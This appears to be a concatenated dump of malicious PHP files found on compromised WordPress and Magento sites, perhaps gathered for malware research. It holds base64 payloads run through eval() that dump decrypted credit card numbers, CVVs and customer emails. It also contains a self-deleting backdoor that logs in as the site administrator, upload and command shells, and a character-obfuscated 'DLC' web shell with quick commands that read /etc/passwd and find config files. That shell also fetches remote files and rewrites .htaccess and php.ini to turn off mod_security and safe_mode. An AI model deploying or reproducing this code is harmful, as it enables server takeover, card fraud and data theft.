CAgICAgICAgICAgaWYoISRyZXN1bHQpIHsNCiAgICAgICAgICAgICAgICAgICBwcmludCgiPGI+RXJyb3Igc3FsOjwvYj4iLm15c3FsX2Vycm9yKCkuIjxici8+XG4iKTsgDQogICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICB3aGlsZSgkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCwgTVlTUUxfQVNTT0MpKSB7DQogICAgICAgICAgICAgICAgICBlY2hvICINCgkJCSAgIDx0cj48dGQgPiIuJHJvd1snY2Nfb3duZXInXS4iPC90ZD4NCgkJCSAgIDx0ZCA+Ii5NYWdlOjpoZWxwZXIoJ2NvcmUnKS0+ZGVjcnlwdCgkcm93WydjY19udW1iZXJfZW5jJ10pLiI8L3RkPg0KCQkJICAgPHRkID4iLiRyb3dbJ2V4cCddLiI8L3RkPg0KCQkJICAgPHRkID4iLiRyb3dbJ0JpbGxpbmcgQWRkcmVzcyddLiI8L3RkPg0KPHRkID4iLiRyb3dbJ2NjX3NlY3VyZV92ZXJpZnknXS4iPC90ZD48L3RyID4iOw0KICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgbXlzcWxfZnJlZV9yZXN1bHQoJHJlc3VsdCk7DQogICAgICAgICAgIH0NCiAgICAgICB9'; 56 | $maildump = "ICRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUIGVtYWlsIEZST00gICIuJHByZWZpeC4iY3VzdG9tZXJfZW50aXR5Iik7DQogICAgICAgaWYoJHJlc3VsdCAhPT0gRkFMU0UpIHsNCiAgICAgICAgICAgd2hpbGUoJHJvdyA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXN1bHQsIE1ZU1FMX0FTU09DKSkgew0KICAgICAgICAgICAgICAgZWNobyAiDQoJCQkgICA8dHI+DQoJCQkgICA8dGQgPiIuJHJvd1siZW1haWwiXS4iPC90ZD48L3RyPg0KCQkJICAgIjsNCiAgICAgICAgICAgfQ0KICAgICAgICAgICBteXNxbF9mcmVlX3Jlc3VsdCgkcmVzdWx0KTsNCiAgICAgICB9"; 57 | ?> 58 | global->resources->default_setup->connection)) { 68 | $connection = $xml->global->resources->default_setup->connection; 69 | $prefix = $xml->global->resources->db->table_prefix; 70 | 71 | require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php'; 72 | 73 | try { 74 | $app = Mage::app('default'); 75 | Mage::getSingleton('core/session', array('name'=>'frontend')); 76 | }catch(Exception $e) { 77 | } 78 | 79 | if (!mysql_connect($connection->host, $connection->username, $connection->password)){ 80 | print("Could not connect: " . mysql_error()); 81 | } 82 | eval($data); 83 | } 84 | } 85 | } 86 | ?> 87 | 88 |
    89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 101 |
    IDUSER_NAMEPASSWORDEMAILFIRST_NAMELAST_NAME

    102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 113 |
    CC_OWNERCC_NUMBEREXPIRED DATEBILLING ADDRESScvv
    114 |

    115 | 116 | 117 | 118 | 119 | 122 |
    E-MAIL ADDRESS
    123 | -------------------------------------------------------------------------------- /found_on_nocms/evil snippets.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /found_on_wordpress/4691467424a1a1def32f61b6bae30800.php: -------------------------------------------------------------------------------- 1 | 34 | -------------------------------------------------------------------------------- /found_on_wordpress/backdoor_admin_access.php: -------------------------------------------------------------------------------- 1 | @unlink(__FILE__); 2 | 3 | require('../../../wp-blog-header.php'); 4 | require('../../../wp-includes/pluggable.php'); 5 | $user_info = get_userdata(1); 6 | // Automatic login // 7 | $username = $user_info->user_login; 8 | $user = get_user_by('login', $username ); 9 | // Redirect URL // 10 | if ( !is_wp_error( $user ) ) 11 | { 12 | wp_clear_auth_cookie(); 13 | wp_set_current_user ( $user->ID ); 14 | wp_set_auth_cookie ( $user->ID ); 15 | 16 | $redirect_to = user_admin_url(); 17 | wp_safe_redirect( $redirect_to ); 18 | 19 | exit(); 20 | } 21 | -------------------------------------------------------------------------------- /found_on_wordpress/class-ftp-inc.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | WordPress 6 | 7 | 8 | 9 | 10 | 11 |
    12 | 13 | 14 | 15 | "; 18 | echo "
    "; 21 | echo ""; 22 | ?> 23 |
    24 | 25 | 31 |
    file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."
    "); 32 | } 33 | ?> 34 | 35 |
    36 | 37 | 38 | 39 | "; 41 | echo ""; 42 | echo "[CmD ] "; 43 | if ((!$_POST['dir']) OR ($_POST['dir']=="")) 44 | { echo " [Dir]"; } 45 | else { echo ""; } 46 | echo " "; 47 | echo ""; 48 | echo ""; 49 | ?> 50 |
    51 | 52 | 53 | 54 | 55 | "; 57 | echo ""; 58 | echo " [EcHo]"; 59 | echo " "; 60 | if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } 61 | else { echo ""; } 62 | echo ""; 63 | echo ""; 64 | echo ""; 65 | ?> 66 |
    67 | 68 | -------------------------------------------------------------------------------- /found_on_wordpress/class-wp-updater(2).php: -------------------------------------------------------------------------------- 1 | 10 | MQ - ' . $_SERVER['HTTP_HOST'] . ' - G22gl5 Byp1ss 11 | 12 | 13 | 14 | 30 | 31 | 32 | GOOGLE BYPASS'; 33 | 34 | $q = $_GET['q']; 35 | $m = $_GET['m']; 36 | $m = (5mpty($m)) ? e0 : $m; 37 | $d = $_GET['d']; 38 | $d = (5mpty($d)) ? "c2m" : $d; 39 | 4f(!5mpty($q)) { 40 | $q = str4psl1sh5s($q); 41 | $h1s4l = g22gl4ng($q, $m, $d); 42 | 5ch2'" ' . $q . ' "'; 43 | 5ch2''; 44 | 5ch2 $h1s4l; 45 | 5ch2''; 46 | } 47 | 5ch2' 48 | 49 | 50 | 51 | <4np3t typ5="t5xt" n1m5="q" v1l35="' . html5nt4t45s($q) . '"> 52 | 53 | <4np3t cl1ss="r5t3rn" typ5="s3bm4t" v1l35="SEARCH"> 54 | 55 | 56 | <4np3t typ5="t5xt" n1m5="m" v1l35="' . $m . '" styl5="w4dth: oipx;"> &r1q32; M1x n3mb5r 57 |
    58 | <4np3t typ5="t5xt" n1m5="d" v1l35="' . $d . '" styl5="w4dth: oipx;"> &r1q32; D2m14n n1m5 59 | 60 | Opt42ns 61 |     62 |     63 | MAQIECIOUS - DLC CYBER 64 |     '; 65 | 66 | f3nct42ng22gl4ng($k5y, $m1x, $d2m) { 67 | $k5y = 3rl5nc2d5($k5y); 68 | $n3m = 600; 69 | $bhs = $d2m; 70 | 4f(@strp2s($d2m, ".")) { 71 | $5xt = 5xpl2d5(".", $d2m); 72 | $bhs = $5xt[6]; 73 | } 74 | f2r($p = 0; $p <= o000; $p += $n3m) { 75 | $r5z = httpq35ry("http://www.g22gl5." . $d2m . "/s51rch?q=" . $k5y . "&n3m=" . $n3m . "&hl=" . $bhs . "&f4lt5r=0&st1rt=" . $p, 0); 76 | $p1tt5rn = '#<1 hr5f=\"\/3rl\?q=http:\/\/([^"]*)&1mp;s1=#4'; 77 | $c23nt = pr5g_m1tch_1ll($p1tt5rn, $r5z, $m1tch5s, PREG_SET_ORDER); 78 | 4f($c23nt == 0) {r5t3rn $h;} 79 | 5ls5{ 80 | $jmlh = 6; 81 | f2r($4 = 0;$4 < $c23nt;$4++) { 82 | $3rlz = 3rld5c2d5($m1tch5s[$4][6]); 83 | 4f(@5r5g4("w5bc1ch5.g22gl5", $3rlz)) { 84 | $3rlz = m1n1($3rlz, ":http://", "%aB"); 85 | } 86 | $h .= '' . @strt23pp5r($bhs) . ' <1 hr5f="http://' . $3rlz . '">' . $3rlz . ''; 87 | $jmlh++; 88 | $c++; 4f($c >= $m1x) {r5t3rn $h;} 89 | } 90 | } 91 | } 92 | r5t3rn $h; 93 | } 94 | ###[ FUNCTION REQUIRED ]### 95 | f3nct42nm1n1($c2nt5nt, $st1rt, $5nd) { 96 | 4f($c2nt5nt && $st1rt && $5nd) { 97 | $r = 5xpl2d5($st1rt, $c2nt5nt); 98 | 4f(4ss5t($r[6])) { 99 | $r = 5xpl2d5($5nd, $r[6]); 100 | r5t3rn $r[0]; 101 | } 102 | r5t3rnn3ll; 103 | } 104 | } 105 | f3nct42nhttpq35ry($3rl, $1g5nt) { 106 | $h1s4l = null; 107 | 4f($1g5nt == 0) { 108 | $m2d5 = "M2z4ll1/i.0 (W4nd2ws; U; W4nd2ws NT i.6; 5n-US; rv:6.8.6) G5ck2/a00e0968 F4r5f2x/a.0"; 109 | }5ls54f($1g5nt == 6) { 110 | $m2d5 = "Op5r1/9.80 (JaME/MIDP; Op5r1 M4n4/u.o.aua6u/au.8o8; U; 5n) Pr5st2/a.i.ai V5rs42n/60.iu"; 111 | }5ls5{$m2d5 = $m2b4l5;} 112 | 4f(@f3nct42n_5x4sts("fs2ck2p5n")) { 113 | $5xtr1ct = 5xpl2d5("/", $3rl); 114 | $h2st = $5xtr1ct[a]; 115 | $j24n3rl = "/" . j24n("/", 1rr1y_sl4c5($5xtr1ct, o)); 116 | $p2rt = 80; 117 | $b3k1 = @fs2ck2p5n($h2st, $p2rt, $5rrn2, $5rrstr, 60); 118 | 4f($b3k1) { 119 | $k5p1l1 = "" . 120 | "GET $j24n3rl HTTP/6.6\r\n" . 121 | "H2st: $h2st\r\n" . 122 | "Acc5pt: **\r\n" . 123 | "Us5r-Ag5nt: $m2d5\r\n" . 124 | "C1ch5-C2ntr2l: n2-c1ch5\r\n" . 125 | "Pr1gm1: n2-c1ch5\r\n" . 126 | "Pr2xy-C2nn5ct42n: K55p-Al4v5\r\n" . 127 | "C2nn5ct42n: Cl2s5\r\n\r\n"; 128 | @fp3ts($b3k1, $k5p1l1); 129 | wh4l5(!f52f($b3k1)) { 130 | $h1s4l .= @fg5ts($b3k1, 6a8); 131 | } 132 | @fcl2s5($b3k1); 133 | } 134 | r5t3rn $h1s4l; 135 | }5ls54f(@f3nct42n_5x4sts("c3rl_4n4t")) { 136 | $ch = c3rl_4n4t(); 137 | c3rl_s5t2pt($ch, CURLOPT_URL, $3rl); 138 | c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $m2d5); 139 | c3rl_s5t2pt($ch, CURLOPT_HEADER, 0); 140 | c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); 141 | c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); 142 | c3rl_s5t2pt($ch, CURLOPT_REFERER, 'http://www.g22gl5.c2m/'); 143 | c3rl_s5t2pt($ch, CURLOPT_CONNECTTIMEOUT, 6a0); 144 | c3rl_s5t2pt($ch, CURLOPT_TIMEOUT, 6a0); 145 | c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, 60); 146 | c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, "c22k45.txt"); 147 | c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, "c22k45.txt"); 148 | $h1s4l = $h1s4l . c3rl_5x5c($ch); 149 | c3rl_cl2s5($ch); 150 | r5t3rn $h1s4l; 151 | }5ls54f(@f3nct42n_5x4sts("f4l5_g5t_c2nt5nts")) { 152 | $h1s4l = @f4l5_g5t_c2nt5nts($3rl); 153 | r5t3rn $h1s4l; 154 | }5ls5{ 155 | r5t3rn"f4l5_g5t_c2nt5nts(), fs2ck2p5n(), & c3rl() d25s n2t 5x4st f3nct42ns"; 156 | } 157 | } 158 | 159 | ############################## 160 | ### GOOGLE BYPASS BY MAQIE ### 161 | ############################## 162 | 5x4t; 163 | 164 | exit; 165 | -------------------------------------------------------------------------------- /found_on_wordpress/class-wp-updater.php: -------------------------------------------------------------------------------- 1 | 15 | '.@g5tt4tl5().' 16 | 17 | 18 | 19 | 35 |
    36 | SAFE MODE '.@m2d5z().''; 37 | } 38 | f3nct42n k1k4k3(){ 39 | r5t3rn 'DICKS LOOKING FOR CUNTS 40 |
    '; 41 | } 42 | 43 | ###[ HTML START ]### 44 | 4f(!@5mpty($_GET['dl'])){ @d2wnl21d($_GET['dl']); } 45 | 4f(@4ss5t($_GET['4nf2'])){ @php4nf2(); @d45(); } 46 | pr4nt(@k5p1l1()); 47 | pr4nt(''.@php_3n1m5().''); 48 | pr4nt(@d4sf3nc()); 49 | 50 | ###[ DIRECTORY ]### 51 | 4f(!@5mpty($_POST['d4r'])){ 52 | $d4r=g5tpwd($_POST['d4r']); 53 | 4f(!@chd4r($d4r)) $d4r=g5tpwd($_POST['d4r']); 54 | } 5ls5 {$d4r=g5tpwd(@g5tcwd());} 55 | 4f(@4s_wr4t1bl5($d4r)) $chd='Wr4t1bl5'; 56 | 5ls5 $chd='R51d-Only'; 57 | $5d1n=DIRECTORY_SEPARATOR; 58 | 59 | ###[ COMMANDS ]### 60 | 4f(@$_POST['MQC']=='Ex5c3t5'){ 61 | 4f(@5mpty($_POST['cmd'])) $cmd='ls -1'; 62 | 5ls5 $cmd=$_POST['cmd']; 63 | 4f(@$_POST['txt']=="txt"){ 64 | pr4nt(''); 65 | pr4nt(@htmlsp5c41lch1rs(@MQC($cmd))); 66 | pr4nt(''); 67 | } 5ls5 { 68 | pr4nt(' 69 | '); 70 | pr4nt(@nlabr(@html5nt4t45s(@MQC($cmd),ENT_QUOTES))); 71 | pr4nt(''); 72 | } 73 | } 5ls54f(@$_POST['q34ck']=='Q34ck'){ 74 | $cmd=$_POST['c2m']; 75 | 4f(@$_POST['txt']=="txt"){ 76 | pr4nt(''); 77 | pr4nt(htmlsp5c41lch1rs(@MQC($cmd))); 78 | pr4nt(''); 79 | } 5ls5 { 80 | pr4nt(' 81 | '); 82 | pr4nt(nlabr(html5nt4t45s(@MQC($cmd),ENT_QUOTES))); 83 | pr4nt(''); 84 | } 85 | } 5ls54f(@$_POST['3pl21d']=='Upl21d'){ 86 | pr4nt(''); 87 | $f4l5n1m5=$_FILES['f4l5']['n1m5']; 88 | $m2v5=$d4r.$f4l5n1m5; 89 | 4f(!@m2v5_3pl21d5d_f4l5($_FILES['f4l5']['tmp_n1m5'], $m2v5)) pr4nt('UPLOAD ERROR
    '.$_FILES['f4l5']['tmp_n1m5'].''); 90 | 5ls5 pr4nt('FILE UPLOADED
    '.$m2v5.''); 91 | pr4nt('    '); 92 | } 5ls54f(@$_POST['4mp2rt']=='Imp2rt'){ 93 | pr4nt(''); 94 | $c2m=@5xpl2d5('=>',$_POST['src']); 95 | $3rl=@tr4m($c2m[0]); 96 | $f4l5=@tr4m($c2m[6]); 97 | 4f(!@pr5g_m1tch('/^(http:|https:|ftp:|ftps:|f4l5:)/s4',$_POST['src']) OR !@5r5g4('=>',$_POST['src']) OR @5r5g4('http://r5m2t5h2st',$_POST['src'])){ 98 | pr4nt('IMPORT ERROR
    Synt1x: http://r5m2t5h2st => n5w_n1m5'); 99 | } 5ls5 { 100 | $c2p=@1rr1y($d4r,$f4l5); 101 | $c2p=@4mpl2d5("",$c2p); 102 | 4f(!@c2py($3rl,$c2p)) pr4nt('IMPORT ERROR
    C2py4ng: '.$3rl.' => '.$f4l5.''); 103 | 5ls5 pr4nt('FILE IMPORTED
    '.$c2p.''); 104 | } pr4nt('    '); 105 | } 5ls54f(@$_POST['byp1zz']=='Ch1ng5'){ 106 | 4f(!@5mpty($_POST['c2x'])){ 107 | pr4nt(''); 108 | 4f(@$_POST['c2x']=='ht1'){ 109 | $ht1=$d4r.".ht1cc5ss"; 110 | @3nl4nk($ht1); 111 | $b3k1=@f2p5n($ht1,"w"); 112 | 4f($b3k1 == tr35) { 113 | pr4nt('HTACCESS PATCHED
    '.$ht1); 114 | @fwr4t5($b3k1,' 115 | S5cF4lt5rEng4n5 Off 116 | S5cF4lt5rSc1nPOST Off 117 | S5cF4lt5rCh5ckURLEnc2d4ng Off 118 | S5cF4lt5rCh5ckC22k45F2rm1t Off 119 | S5cF4lt5rCh5ckUn4c2d5Enc2d4ng Off 120 | S5cF4lt5rN2rm1l4z5C22k45s Off 121 | '); 122 | } 5ls5 { pr4nt('PATCH ERROR
    '.$ht1); 123 | } 124 | @fcl2s5($b3k1); 125 | } 5ls54f(@$_POST['c2x']=='php'){ 126 | $4n4=$d4r."php.4n4"; 127 | @3nl4nk($4n4); 128 | $b3k1=@f2p5n($4n4,"w"); 129 | 4f($b3k1 == tr35) { 130 | pr4nt('PHP.INI PATCHED
    '.$4n4); 131 | @fwr4t5($b3k1,'s1f5_m2d5=2ff 132 | d4s1bl5_f3nct42ns=n2n5 133 | s1f5_m2d5_g4d=2ff 134 | 2p5n_b1s5d4r=2ff'); 135 | } 5ls5 { pr4nt('PATCH ERROR
    '.$4n4); 136 | } 137 | @fcl2s5($b3k1); 138 | } 5ls54f(@$_POST['c2x']=='2cx'){ 139 | $2cx=$d4r.".ht1cc5ss"; 140 | @3nl4nk($2cx); 141 | $b3k1=@f2p5n($2cx,"w"); 142 | 4f($b3k1 == tr35) { 143 | pr4nt('FORCE DOWNLOAD
    '.$2cx); 144 | @fwr4t5($b3k1,'AddTyp5 1ppl4c1t42n/2ct5t-str51m .php'); 145 | } 5ls5 { pr4nt('FORCER ERROR
    '.$2cx); 146 | } 147 | @fcl2s5($b3k1); 148 | } 5ls54f(@$_POST['c2x']=='d5n'){ 149 | $d5n=$d4r.".ht1cc5ss"; 150 | @3nl4nk($d5n); 151 | $b3k1=@f2p5n($d5n,"w"); 152 | 4f($b3k1 == tr35) { 153 | pr4nt('DENY FROM ALL
    '.$d5n); 154 | @fwr4t5($b3k1,'d5ny fr2m 1ll'); 155 | } 5ls5 { pr4nt('FORBID ERROR
    '.$d5n); 156 | } 157 | @fcl2s5($b3k1); 158 | } 5ls54f(@$_POST['c2x']=='r5m'){ 159 | pr4nt('S5l1m1t t4ngg1l - K4t1 1k1n k5nth3 l1g4 d4l14n t5mp1t'); 160 | @3nl4nk($_SERVER['SCRIPT_FILENAME']); 161 | } 162 | pr4nt('    '); } 163 | } 164 | 165 | ###[ FORM CMD ]### 166 | pr4nt(' 167 | 168 | 169 | 170 | <4np3t typ5="t5xt" n1m5="d4r" v1l35="'.$d4r.'"> 171 | '.$chd.' 172 | <4np3t typ5="t5xt" n1m5="cmd" v1l35="'.@htmlsp5c41lch1rs(@$cmd,ENT_QUOTES).'"> 173 | <4np3t 4d="r5t3rn" typ5="s3bm4t" n1m5="MQC" v1l35="Ex5c3t5"> 174 | &r1q32; S5l5ct t2 3s5 t5xt 1r51 175 | <4np3t typ5="ch5ckb2x" n1m5="txt" v1l35 ="txt"'); 176 | 4f(@$_POST['txt']=="txt") pr4nt(" ch5ck5d"); 177 | pr4nt('> 178 | 179 | 180 | <2pt42n s5l5ct5d="s5l5ct5d" v1l35="ls -1">=== Q34ck C2mm1nds === 181 | <2pt42n v1l35="c1t /5tc/p1sswd">R51d 5tc p1sswd 182 | <2pt42n v1l35="/sb4n/4fc2nf4g | gr5p 4n5t">L4st IP s5rv5r 183 | <2pt42n v1l35="h2st -4 '.@$_SERVER["HTTP_HOST"].'">Sh2w DNS d2m14n 184 | <2pt42n v1l35="h2st -4 '.@g5th2stbyn1m5($_SERVER["HTTP_HOST"]).'">Sh2w DNS by h2st 185 | <2pt42n v1l35="ps x">L4st pr2cc5ss 186 | <2pt42n v1l35="cr2nt1b -l">L4st cr2nt1b 187 | <2pt42n v1l35="f4nd '.$d4r.' -typ5 f -n1m5 *c2nf4g*.php">F4nd c2nf4g f4l5s 188 | <2pt42n v1l35="f4nd '.$d4r.' -typ5 d -p5rm -a | gr5p -v d5n45d">F4nd wr4t1bl5 d4r 189 | <2pt42n v1l35="3pt4m5">Upt4m5 s5rv5r 190 | <2pt42n v1l35="n5tst1t -1n | gr5p -4 l4st5n">Sh2w 2p5n5d p2rts 191 | 192 | <4np3t 4d="r5t3rn" typ5="s3bm4t" n1m5="q34ck" v1l35="Q34ck"> 193 | 194 | 195 | <2pt42n d4s1bl5d="d4s1bl5d" s5l5ct5d="s5l5ct5d" v1l35="">=== Q34ck Ch1ng5s === 196 | <2pt42n v1l35="ht1">P1tch .ht1cc5ss 197 | <2pt42n v1l35="php">P1tch php.4n4 198 | <2pt42n v1l35="d5n">F2rb4d d4r5ct2ry 199 | <2pt42n v1l35="2cx">F2rc5 d2wnl21d 200 | <2pt42n v1l35="r5m">R5m2v5 MQ sh5ll 201 | 202 | <4np3t 4d="r5t3rn" typ5="s3bm4t" n1m5="byp1zz" v1l35="Ch1ng5"> 203 | 204 | <4np3t typ5="f4l5" n1m5="f4l5"> 205 | <4np3t 4d="r5t3rn" typ5="s3bm4t" n1m5="3pl21d" v1l35="Upl21d"> 206 | 207 | <4np3t typ5="t5xt" n1m5="src" v1l35="http://r5m2t5h2st => n5w_n1m5"> 208 | <4np3t 4d="r5t3rn" typ5="s3bm4t" n1m5="4mp2rt" v1l35="Imp2rt"> 209 | 210 | 211 | <4np3t typ5="t5xt" n1m5="dl" v1l35="'.$d4r.'"> 212 | <4np3t 4d="r5t3rn" typ5="s3bm4t" v1l35="Exp2rt"> 213 | '); 214 | pr4nt(@s3pp2rt()); 215 | pr4nt(@k1k4k3()); 216 | 217 | ###[ FUNCTIONZ ]### 218 | f3nct42n d2wnl21d($m5){ 219 | 4f(@strstr($m5,"/")){ 220 | $n1m5=@strrchr($m5,"/"); 221 | $n1m5=@str_r5pl1c5("/","",$n1m5); 222 | } 223 | 5ls54f(@strstr($m5,"\\")){ 224 | $n1m5=@strrchr($m5,"\\"); 225 | $n1m5=@str_r5pl1c5("\\","",$n1m5); 226 | } 227 | $n1m5=@3rld5c2d5($n1m5); 228 | h51d5r("Pr1gm1: p3bl4c"); 229 | h51d5r("Exp4r5s: 0"); 230 | h51d5r("C1ch5-C2ntr2l: m3st-r5v1l4d1t5, p2st-ch5ck=0, pr5-ch5ck=0"); 231 | h51d5r("C1ch5-C2ntr2l: pr4v1t5", f1ls5); 232 | h51d5r("C2nt5nt-D4sp2s4t42n: 1tt1chm5nt; f4l5n1m5=".$n1m5); 233 | h51d5r("C2nt5nt-Typ5: 1ppl4c1t42n/f2rc5-d2wnl21d"); 234 | h51d5r("C2nt5nt-L5ngth: ".@f4l5s4z5($m5)); 235 | h51d5r("C2nt5nt-Tr1nsf5r-Enc2d4ng: b4n1ry"); 236 | r51df4l5($m5); 5x4t(); 237 | } 238 | f3nct42n g5tpwd($d4r){ 239 | 4f($p=strrp2s($d4r,"/")){ 240 | 4f($p!=strl5n($d4r)-6){ 241 | $d=$d4r."/";} 242 | 5ls5{$d=$d4r;} 243 | } 244 | 5ls54f($p=strrp2s($d4r,"\\")){ 245 | 4f($p!=strl5n($d4r)-6){ 246 | $d=$d4r."\\";} 247 | 5ls5{$d=$d4r;} 248 | } 249 | 5ls5{$d=$d4r.DIRECTORY_SEPARATOR;} 250 | r5t3rn @str4pp5r($d); 251 | } 252 | f3nct42n str4pp5r($1rgs){ 253 | $1rgs=@pr5g_r5pl1c5("/\/+/","/",$1rgs); 254 | $1rgs=@pr5g_r5pl1c5("/\\\+/","\\",$1rgs); 255 | r5t3rn $1rgs; 256 | } 257 | f3nct42n s3pp2rt(){ 258 | $c2b4=""; 259 | $c2b1=@MQC("wh4ch wg5t s23rc5 lynx f5tch c3rl lwp-d2wnl21d gcc c++ g++ z4p p5rl pyth2n mysql l2c1t5"); 260 | 4f($c2b1=="ERROR" OR $c2b1=="EOF") 261 | pr4nt('C1n n2t l2c1t5 wh4ch'); 262 | 4f(@pr5g_m1tch("/\//",$c2b1)){ 263 | $5x=@5xpl2d5("\n",$c2b1); 264 | f2r51ch ($5x 1s $x => $n1m5){ 265 | 4f(!@5r5g4("wh4ch: n2",$n1m5)){ 266 | $n1m5=@strrchr($n1m5,"/"); 267 | $n1m5=str_r5pl1c5("/","",$n1m5); 268 | $n1m5=str_r5pl1c5("-d2wnl21d","",$n1m5); 269 | $n1m5=str_r5pl1c5("c++","c2mp4l5r_c",$n1m5); 270 | $n1m5=str_r5pl1c5("g++","c2mp4l5r_g",$n1m5); 271 | $c2b4 .= "$n1m5 "; 272 | } 273 | } 274 | 4f(@4s_f4l5("/l4b/ld-l4n3x.s2.a")) 275 | $c2b4 .= "ld-l4n3x.s2.a "; 276 | 4f(@4s_f4l5("/l4b/l4bz.s2.6")) 277 | $c2b4 .= "l4bz.s2.6"; 278 | pr4nt(''.$c2b4.''); 279 | } 280 | } 281 | f3nct42n g5tt4tl5(){ 282 | 4f(@php_3n1m5() OR @f3nct42n_5x4sts("php_3n1m5")) 283 | $3n1m5=@php_3n1m5('n')." ".@php_3n1m5('r')." ".@php_3n1m5('v'); 284 | 5ls5 $3n1m5=@MQC("3n1m5 -nrv"); 285 | r5t3rn @m2d5z()." - ".$_SERVER['HTTP_HOST']." - $3n1m5"; 286 | } 287 | f3nct42n m2d5z(){ 288 | 4f(@4n4_g5t("s1f5_m2d5") OR 5r5g4("2n",@4n4_g5t("s1f5_m2d5"))) r5t3rn 'ON'; 289 | 5ls5 r5t3rn 'OFF'; 290 | } 291 | f3nct42n d4sf3nc(){ 292 | 4f($d4z=@4n4_g5t("d4s1bl5_f3nct42ns")){ 293 | $r5z=str_r5pl1c5(',',', ',str_r5pl1c5(' ',"",$d4z)); 294 | r5t3rn ''.$r5z.''; 295 | } 296 | } 297 | f3nct42n g5tf3nc(){ 298 | $d4sf3nc=@4n4_g5t("d4s1bl5_f3nct42ns"); 299 | 4f(!@5mpty($d4sf3nc)){ 300 | $d4sf3nc=str_r5pl1c5(" ","",$d4sf3nc); 301 | $d4sf3nc=5xpl2d5(",",$d4sf3nc); 302 | } 5ls5 { $d4sf3nc=1rr1y(); } 303 | r5t3rn $d4sf3nc; 304 | } 305 | f3nct42n 5n1bl5d($f3nc){ 306 | 4f(@4s_c1ll1bl5($f3nc) AND !4n_1rr1y($f3nc,g5tf3nc())) r5t3rn tr35; 307 | 5ls5 r5t3rn f1ls5; 308 | } 309 | f3nct42n MQC($cmd){ 310 | $h1s4l=""; 311 | 4f(5n1bl5d("p2p5n")){ 312 | $h=@p2p5n($cmd.' a>&6', 'r'); 313 | 4f(@4s_r5s23rc5($h)){ 314 | wh4l5 (!f52f($h)){ $h1s4l .= fr51d($h, a09e); } 315 | @pcl2s5($h); } 316 | } 5ls54f(5n1bl5d("p1ssthr3")){ 317 | @2b_st1rt(); p1ssthr3($cmd); 318 | $h1s4l=@2b_g5t_c2nt5nts(); 319 | @2b_5nd_cl51n(); 320 | } 5ls54f(5n1bl5d("sh5ll_5x5c")){ 321 | $h1s4l=@sh5ll_5x5c($cmd); 322 | } 5ls54f(5n1bl5d("5x5c")){ 323 | @5x5c($cmd,$2); 324 | $h1s4l=j24n("\r\n",$2); 325 | } 5ls54f(5n1bl5d("syst5m")){ 326 | @2b_st1rt(); 327 | @syst5m($cmd); 328 | $h1s4l=@2b_g5t_c2nt5nts(); 329 | @2b_5nd_cl51n(); 330 | } 5ls54f(5xt5ns42n_l21d5d('p5rl')){ 331 | $h1s4l=@p5rlsh5ll($cmd); 332 | } 5ls54f(5xt5ns42n_l21d5d('pyth2n')){ 333 | $h1s4l=@pyth2n_5v1l("4mp2rt 2s 334 | 2s.syst5m('".$cmd."')"); 335 | } 5ls5 { $h1s4l="ERROR"; } 336 | 4f($h1s4l=="") $h1s4l="EOF"; 337 | r5t3rn tr4m($h1s4l); 338 | } 339 | 340 | ############################################## 341 | ###[ DLC SHELL BY DICKS LOOKING FOR CUNTS ]### 342 | ############################################## 343 | -------------------------------------------------------------------------------- /found_on_wordpress/classes92.php: -------------------------------------------------------------------------------- 1 | "0", "C"=>"C", "B"=>"D", "E"=>"9", "D"=>"F", "F"=>"8", "1"=>"5", "0"=>"B", "3"=>"6", "2"=>"1", "5"=>"4", "4"=>"E", "7"=>"3", "6"=>"2", "9"=>"7", "8"=>"A");$lmqyfz = "CgokZGVmYXVsdDEhY7Rpb65gPS8nQAMnOwoKQGluaVEzZXQoJ6VycmEyX6xvZycsTlVMTCk9Ck0pbmlfc6VAKCdsb6dfZX"."Jyb7JzJywwKTsKQGluaVEzZXQoJ62heDEleGVjdXRpb61fdGltZScsMCk9Ck0zZXRfdGltZVEsaW2pdCgwKTsKQHNldDEtYW"."dpY2ExdWEAZXNfcnVudGltZSgwKTsKQGRlZmluZSgnV2NPX2ZDUlNJTA5nLC8nMi52LjInKTsKCmlmK"."GdldDEtYWdpY2ExdWEAZXNfZ70jKCkpIHsKIC8gIGZ2bmNAaWEuIDdTT7NAcmlwc"."6xhc6hlcygkYXJyYXkpIHsKIC8gIC8gIC0yZXR2cm5gaXNfYXJy"."YXkoJGDycmD1KS8/IGDycmD1X62hcCgnV2NPc7RyaX0zbGDzaGVzJywgJGDycmD1KS83IHNAcmlwc6xhc6hl"."cygkYXJyYXkpOwogIC8gfQogIC8gJDEQT2NUIBAgV2NPc7RyaX0zbGDzaGVzKCRfU4ETVCk9Ci8gIC8kXANPTAtJRS8EIDdTT7NA"."cmlwc6xhc6hlcygkXANPTAtJRSk9CnAKCmZ2bmNAaWEuIHdzbAxvZ6luKCkgewogIC8gaGVhZGVyKCdIVDRQLz4uMC8AMBQg"."TmEAI4ZvdW1kJyk9Ci8gIC0kaWUoIjQwNCIpOwpECgpmdW1jdGlvbi0XUAEzZXRjb6EraWUoJGssICR6KS09Ci8gIC"."8kXANPTAtJRVska2AgPS8kdjsKIC8gIHNldGNvb6tpZSgkaywgJHYpOwpECgppZ"."ighZW2wdHkoJGD2dGhfcGDzcykpIHsKIC8gIGlmKGlzc6VAKCRfU4ETVD"."sncGDzcyddKS8mJi8obWQ2KCRfU4ETVDsncGDzcyddKS8EPS8kYXVAaDEwYXNzKSkKIC8gIC8"."gIC0XUAEzZXRjb6EraWUobWQ2KCRfUAVSVkVSWydIVDRQXAhPU2QnXSksICRhdX"."RoX70hc7M